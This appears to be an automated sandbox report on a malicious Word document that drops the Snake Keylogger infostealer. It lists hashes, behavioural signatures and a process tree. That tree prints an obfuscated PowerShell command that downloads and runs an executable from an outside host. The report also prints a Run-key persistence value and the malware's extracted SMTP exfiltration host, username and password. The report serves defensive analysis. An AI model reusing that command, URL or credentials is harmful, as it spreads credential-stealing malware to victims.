Analysis
-
max time kernel
279s -
max time network
298s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
23-07-2021 14:01
Static task
static1
Behavioral task
behavioral1
Sample
Specifications_Details_202300_RFQ.doc
Resource
win7v20210408
Behavioral task
behavioral2
Sample
Specifications_Details_202300_RFQ.doc
Resource
win10v20210410
General
-
Target
Specifications_Details_202300_RFQ.doc
-
Size
238KB
-
MD5
9efbd937ce6f8fef4ad85ee94d9cfd47
-
SHA1
d8eb24e90091238e2f6bd204ea67d54c5c4efdb6
-
SHA256
574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5
-
SHA512
86e2b112d30a010096fca79fea0bdbd1c927a7548ea172f8e9d763bcca54216b836ae9edd960d9c844ebd862c48360d4c11ef86d6a3822ebd9e469c8ac3d694e
Malware Config
Extracted
http://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe
Extracted
snakekeylogger
Protocol: smtp- Host:
netjul.xyz - Port:
587 - Username:
silyatwo@netjul.xyz - Password:
Q;QcczP{&6=~
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 4092 508 cmd.exe WINWORD.EXE -
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
twodark.exepid process 4272 twodark.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
twodark.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrom = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrom\\chrom.exe\"" twodark.exe -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 36 checkip.dyndns.org 39 freegeoip.app 40 freegeoip.app -
Suspicious use of SetThreadContext 1 IoCs
Processes:
twodark.exedescription pid process target process PID 4208 set thread context of 4272 4208 twodark.exe twodark.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Runs ping.exe 1 TTPs 4 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEpid process 4524 PING.EXE 4744 PING.EXE 4968 PING.EXE 2192 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exepid process 3872 powershell.exe 3872 powershell.exe 3872 powershell.exe 4356 powershell.exe 4356 powershell.exe 4356 powershell.exe 4560 powershell.exe 4560 powershell.exe 4560 powershell.exe 4800 powershell.exe 4800 powershell.exe 4800 powershell.exe 5020 powershell.exe 5020 powershell.exe 5020 powershell.exe 4208 twodark.exe 4208 twodark.exe 4272 twodark.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exetwodark.exetwodark.exedescription pid process Token: SeDebugPrivilege 3872 powershell.exe Token: SeDebugPrivilege 4356 powershell.exe Token: SeDebugPrivilege 4560 powershell.exe Token: SeDebugPrivilege 4800 powershell.exe Token: SeDebugPrivilege 5020 powershell.exe Token: SeDebugPrivilege 4208 twodark.exe Token: SeDebugPrivilege 4272 twodark.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE 508 WINWORD.EXE -
Suspicious use of WriteProcessMemory 39 IoCs
Processes:
WINWORD.EXEcmd.exepowershell.exetwodark.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process target process PID 508 wrote to memory of 4092 508 WINWORD.EXE cmd.exe PID 508 wrote to memory of 4092 508 WINWORD.EXE cmd.exe PID 4092 wrote to memory of 3872 4092 cmd.exe powershell.exe PID 4092 wrote to memory of 3872 4092 cmd.exe powershell.exe PID 3872 wrote to memory of 4208 3872 powershell.exe twodark.exe PID 3872 wrote to memory of 4208 3872 powershell.exe twodark.exe PID 3872 wrote to memory of 4208 3872 powershell.exe twodark.exe PID 4208 wrote to memory of 4356 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 4356 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 4356 4208 twodark.exe powershell.exe PID 4356 wrote to memory of 4524 4356 powershell.exe PING.EXE PID 4356 wrote to memory of 4524 4356 powershell.exe PING.EXE PID 4356 wrote to memory of 4524 4356 powershell.exe PING.EXE PID 4208 wrote to memory of 4560 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 4560 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 4560 4208 twodark.exe powershell.exe PID 4560 wrote to memory of 4744 4560 powershell.exe PING.EXE PID 4560 wrote to memory of 4744 4560 powershell.exe PING.EXE PID 4560 wrote to memory of 4744 4560 powershell.exe PING.EXE PID 4208 wrote to memory of 4800 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 4800 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 4800 4208 twodark.exe powershell.exe PID 4800 wrote to memory of 4968 4800 powershell.exe PING.EXE PID 4800 wrote to memory of 4968 4800 powershell.exe PING.EXE PID 4800 wrote to memory of 4968 4800 powershell.exe PING.EXE PID 4208 wrote to memory of 5020 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 5020 4208 twodark.exe powershell.exe PID 4208 wrote to memory of 5020 4208 twodark.exe powershell.exe PID 5020 wrote to memory of 2192 5020 powershell.exe PING.EXE PID 5020 wrote to memory of 2192 5020 powershell.exe PING.EXE PID 5020 wrote to memory of 2192 5020 powershell.exe PING.EXE PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe PID 4208 wrote to memory of 4272 4208 twodark.exe twodark.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\frontcheck.bat" "2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\Documents\twodark.exe"C:\Users\Public\Documents\twodark.exe"4⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com6⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\twodark.exeC:\Users\Admin\AppData\Local\Temp\twodark.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
e33ed3d4cc9b2e5a08ae25747ef47620
SHA1e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7
SHA2560e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f
SHA5129e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\twodark.exe.logMD5
9e7845217df4a635ec4341c3d52ed685
SHA1d65cb39d37392975b038ce503a585adadb805da5
SHA256d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b
SHA512307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
26775a2c4cd16b49fce348873add8b2b
SHA10215a1c53f03e8cc2dd2c618b772f6f42be38ccd
SHA256a7e9973343b953a03bd9ee13e7a704e2e8b5556e4b5ac15a535d6025fd4c2764
SHA512b73e4d14f4598e537227a7e9870b803777beed387802768635d40a674ec6003a09be62b736315dff4569567f65120eb834b64395311ead7bcb56529ab23ca296
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
1517f2189a3a3bf00de1fbe031c72c8a
SHA17764187b2273ce4f3dd21d5d23e3a2aa3ebbbfd5
SHA25613e1f6e0cd8c5df88f34bfa538a4fc24a664c00158b2ad6e2eefb4141142ffc5
SHA512faa90b13001e97f95c06956e77e7994d3a7cac33595695267eda24854a8fda17627af7c46bf058ebfc3a8936339e994b531f111cb234a3ee9b351920a2862a70
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
b5fa2fa4fd3df8885f7868fe07a83e02
SHA1611709a6018c04f3e4f081c6295f6da68e6cc13f
SHA2567f6c938152ba9e2e2c3f46122a09f92d32aedd09354b75aa28154142cfb7770c
SHA512b3e6ad34bb0168a47af5bfd0fba6005ae07fbe07a1d0885caf0d095fba5cde3f643c2be3903a6a8e1848ba3e9da2f45594c3248efe08048c40d5ba4a8cd1919f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
83c19fb800cdb6c2dc4ef021b0c0e3de
SHA1e37072a485a36b2af938caa889bb98a9bcfddacf
SHA256c32bf0337a8cbf3b2506856f5b3f90d781af2125d80ce27be375332b318ad37b
SHA5120788aeba7a60941f31006ce11cab31162d0f82fa08579e2cba5d9b927da396f0d34b6bebf850980fe87b81decdbbad17af9d43bea2c80be2b6ca22b9608dd2a7
-
C:\Users\Admin\AppData\Local\Temp\twodark.exeMD5
288e4cbacba92f857bfd5cf62692606d
SHA121545f749883d4c24b41ef6fe670978acd424dc6
SHA2567f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233
SHA512654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1
-
C:\Users\Admin\AppData\Local\Temp\twodark.exeMD5
288e4cbacba92f857bfd5cf62692606d
SHA121545f749883d4c24b41ef6fe670978acd424dc6
SHA2567f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233
SHA512654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1
-
C:\Users\Public\Documents\frontcheck.batMD5
87ccb0ab85a10b4b9a47b2d0ef0f37c9
SHA1967fb3ca52c787d984e0e08a2675223c45f96644
SHA256a046e1c4e6ff5c4f5702cb4581042bae2c0633700fe5637e30b96adb0206bafd
SHA5124d1d4af7bdf3f7ef5dd734e3d41c6b9b67ea675f6587fa4d2dd0475f37b93b1226ae0aa26c9742e132d4b047272881c2f189cb19e82705c218e982d9bb520dc2
-
memory/508-122-0x00007FF969780000-0x00007FF96A86E000-memory.dmpFilesize
16.9MB
-
memory/508-123-0x00007FF967880000-0x00007FF969775000-memory.dmpFilesize
31.0MB
-
memory/508-115-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-116-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-117-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-114-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-119-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmpFilesize
64KB
-
memory/508-118-0x00007FF9702D0000-0x00007FF972DF3000-memory.dmpFilesize
43.1MB
-
memory/2192-489-0x0000000000000000-mapping.dmp
-
memory/3872-274-0x00000118C5840000-0x00000118C5841000-memory.dmpFilesize
4KB
-
memory/3872-404-0x00000118C56B6000-0x00000118C56B8000-memory.dmpFilesize
8KB
-
memory/3872-392-0x00000118C57E0000-0x00000118C57E1000-memory.dmpFilesize
4KB
-
memory/3872-352-0x00000118C5670000-0x00000118C5671000-memory.dmpFilesize
4KB
-
memory/3872-260-0x0000000000000000-mapping.dmp
-
memory/3872-267-0x00000118C56B3000-0x00000118C56B5000-memory.dmpFilesize
8KB
-
memory/3872-266-0x00000118C56B0000-0x00000118C56B2000-memory.dmpFilesize
8KB
-
memory/3872-265-0x00000118C5640000-0x00000118C5641000-memory.dmpFilesize
4KB
-
memory/4092-257-0x0000000000000000-mapping.dmp
-
memory/4208-411-0x0000000005730000-0x0000000005731000-memory.dmpFilesize
4KB
-
memory/4208-495-0x00000000093E0000-0x000000000944E000-memory.dmpFilesize
440KB
-
memory/4208-490-0x0000000006CA0000-0x0000000006CE9000-memory.dmpFilesize
292KB
-
memory/4208-415-0x0000000005170000-0x0000000005202000-memory.dmpFilesize
584KB
-
memory/4208-414-0x0000000005170000-0x0000000005202000-memory.dmpFilesize
584KB
-
memory/4208-413-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB
-
memory/4208-412-0x0000000005230000-0x0000000005231000-memory.dmpFilesize
4KB
-
memory/4208-409-0x0000000000950000-0x0000000000951000-memory.dmpFilesize
4KB
-
memory/4208-407-0x0000000000000000-mapping.dmp
-
memory/4272-507-0x0000000005890000-0x0000000005891000-memory.dmpFilesize
4KB
-
memory/4272-510-0x00000000057F0000-0x0000000005CEE000-memory.dmpFilesize
5.0MB
-
memory/4272-500-0x000000000041FFDE-mapping.dmp
-
memory/4272-499-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/4356-429-0x0000000007E20000-0x0000000007E21000-memory.dmpFilesize
4KB
-
memory/4356-421-0x0000000006BC0000-0x0000000006BC1000-memory.dmpFilesize
4KB
-
memory/4356-416-0x0000000000000000-mapping.dmp
-
memory/4356-447-0x00000000009E3000-0x00000000009E4000-memory.dmpFilesize
4KB
-
memory/4356-448-0x00000000009E4000-0x00000000009E6000-memory.dmpFilesize
8KB
-
memory/4356-419-0x0000000000FC0000-0x0000000000FC1000-memory.dmpFilesize
4KB
-
memory/4356-420-0x0000000006E70000-0x0000000006E71000-memory.dmpFilesize
4KB
-
memory/4356-430-0x0000000007C30000-0x0000000007C31000-memory.dmpFilesize
4KB
-
memory/4356-422-0x0000000006C60000-0x0000000006C61000-memory.dmpFilesize
4KB
-
memory/4356-423-0x0000000006DD0000-0x0000000006DD1000-memory.dmpFilesize
4KB
-
memory/4356-428-0x00000000074A0000-0x00000000074A1000-memory.dmpFilesize
4KB
-
memory/4356-424-0x00000000009E0000-0x00000000009E1000-memory.dmpFilesize
4KB
-
memory/4356-425-0x00000000009E2000-0x00000000009E3000-memory.dmpFilesize
4KB
-
memory/4356-426-0x0000000007610000-0x0000000007611000-memory.dmpFilesize
4KB
-
memory/4524-431-0x0000000000000000-mapping.dmp
-
memory/4560-454-0x0000000000CC4000-0x0000000000CC6000-memory.dmpFilesize
8KB
-
memory/4560-446-0x0000000000CC2000-0x0000000000CC3000-memory.dmpFilesize
4KB
-
memory/4560-445-0x0000000000CC0000-0x0000000000CC1000-memory.dmpFilesize
4KB
-
memory/4560-432-0x0000000000000000-mapping.dmp
-
memory/4560-453-0x0000000000CC3000-0x0000000000CC4000-memory.dmpFilesize
4KB
-
memory/4744-450-0x0000000000000000-mapping.dmp
-
memory/4800-472-0x00000000013C3000-0x00000000013C4000-memory.dmpFilesize
4KB
-
memory/4800-469-0x00000000013C2000-0x00000000013C3000-memory.dmpFilesize
4KB
-
memory/4800-468-0x00000000013C0000-0x00000000013C1000-memory.dmpFilesize
4KB
-
memory/4800-455-0x0000000000000000-mapping.dmp
-
memory/4800-473-0x00000000013C4000-0x00000000013C6000-memory.dmpFilesize
8KB
-
memory/4968-470-0x0000000000000000-mapping.dmp
-
memory/5020-498-0x0000000001104000-0x0000000001106000-memory.dmpFilesize
8KB
-
memory/5020-497-0x0000000001103000-0x0000000001104000-memory.dmpFilesize
4KB
-
memory/5020-474-0x0000000000000000-mapping.dmp
-
memory/5020-488-0x0000000001102000-0x0000000001103000-memory.dmpFilesize
4KB
-
memory/5020-487-0x0000000001100000-0x0000000001101000-memory.dmpFilesize
4KB